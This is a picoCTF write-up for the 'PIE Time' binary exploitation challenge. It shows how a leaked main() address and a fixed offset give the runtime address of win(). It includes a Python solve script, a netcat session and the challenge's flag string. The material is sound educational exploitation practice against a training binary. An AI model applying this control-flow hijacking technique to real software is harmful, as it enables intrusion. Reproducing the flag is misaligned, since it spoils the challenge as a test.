picoCTF - PIE TIME (Binary exploitation) - Writeup

28.10.2025

#picoCTF #binary-exploitation #PIE #ASLR #writeup


I worked through the PIE Time picoCTF challenge. It is a simple PIE exercise that teaches a useful trick. The binary is compiled as PIE (position-independent), so with ASLR enabled its code is loaded at a randomized base on every run. That sounds scary, but the program leaks the runtime address of main, and one leaked address is all you need to recover the base and locate every other function in the binary.

What the program does

When you connect it prints something like:

Address of main: 0x5d4ab809e33d
Enter the address to jump to, ex => 0x12345:

So it gives you the runtime address of main, then asks for an address to jump to. If you can figure out where win() is relative to main(), you can compute win()’s runtime address and hand it to the program.

Static analysis

From the disassembly:

000000000000133d <main>
00000000000012a7 <win>

The difference is:

0x133d - 0x12a7 = 0x96

That 0x96 is a constant offset between the two functions inside the binary. PIE randomizes the load base, but not that distance. The only requirement is that the offsets come from the same binary the server runs (the one shipped with the challenge); a rebuilt or differently compiled copy will have different addresses. A quick sanity check: the load base (leaked main minus 0x133d) should be page-aligned, i.e. end in 000.

How to exploit it

Server prints:

Address of main: 0x5d4ab809e33d

Compute:

0x5d4ab809e33d - 0x96 = 0x5d4ab809e2a7

Send that address back as your input. The program will call that address (which is win) and print the flag.
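The computation above, turned into a small solve script. This is an added example and not part of the original writeup; it uses only the Python standard library (no pwntools) and assumes the offsets 0x133d and 0x12a7 taken from the disassembly above, the banner text the program prints, and that the program accepts a 0x-prefixed hex address as shown in the session below. Besides the subtraction it also recovers the PIE base and checks that it is page-aligned, which catches the case where the offsets were read from a different build of the binary.

```python
import re
import socket

# Static offsets of the two functions in the shipped binary (from objdump/nm),
# i.e. their addresses before any PIE base is applied.
MAIN_OFF = 0x133d
WIN_OFF = 0x12a7

# Banner line the program prints on connect (format taken from the writeup).
BANNER_RE = re.compile(rb"Address of main: (0x[0-9a-fA-F]+)")


def parse_main_leak(banner: bytes) -> int:
    """Pull the leaked runtime address of main() out of the program's banner."""
    m = BANNER_RE.search(banner)
    if m is None:
        raise ValueError("no 'Address of main' leak found in banner")
    return int(m.group(1), 16)


def pie_base(main_addr: int, main_off: int = MAIN_OFF) -> int:
    """Recover the load base from the leak. PIE bases are page-aligned, so a
    base with low bits set means the offsets do not belong to this binary."""
    base = main_addr - main_off
    if base & 0xfff:
        raise ValueError(
            f"base {base:#x} is not page aligned; offsets do not match the running binary")
    return base


def win_addr(main_addr: int, main_off: int = MAIN_OFF, win_off: int = WIN_OFF) -> int:
    """Runtime address of win(): base + win_off, which is the same as
    main_addr - (main_off - win_off), i.e. main_addr - 0x96 for this binary."""
    return pie_base(main_addr, main_off) + win_off


def solve(host: str, port: int) -> bytes:
    """Connect, read the leak, send the computed win() address, return the reply."""
    with socket.create_connection((host, port), timeout=10) as s:
        banner = b""
        while b"Enter the address" not in banner:
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("server closed before printing the prompt")
            banner += chunk
        target = win_addr(parse_main_leak(banner))
        s.sendall(f"{target:#x}\n".encode())  # 0x-prefixed hex, as in the session
        out = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            out += chunk
    return out


if __name__ == "__main__":
    import sys
    # Usage: python solve.py <host> <port>
    print(solve(sys.argv[1], int(sys.argv[2])).decode(errors="replace"))
```

Run it against the challenge host and port; with the leak from the session above it sends 0x5d4ab809e2a7, the same value computed by hand.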

Example session I saw:

$ nc rescued-float.picoctf.net 59250
Address of main: 0x5d4ab809e33d
Enter the address to jump to, ex => 0x12345: 0x5D4AB809E2A7
You won!
picoCTF{b4s1c_p051t10n_1nd3p3nd3nc3_f8845f06}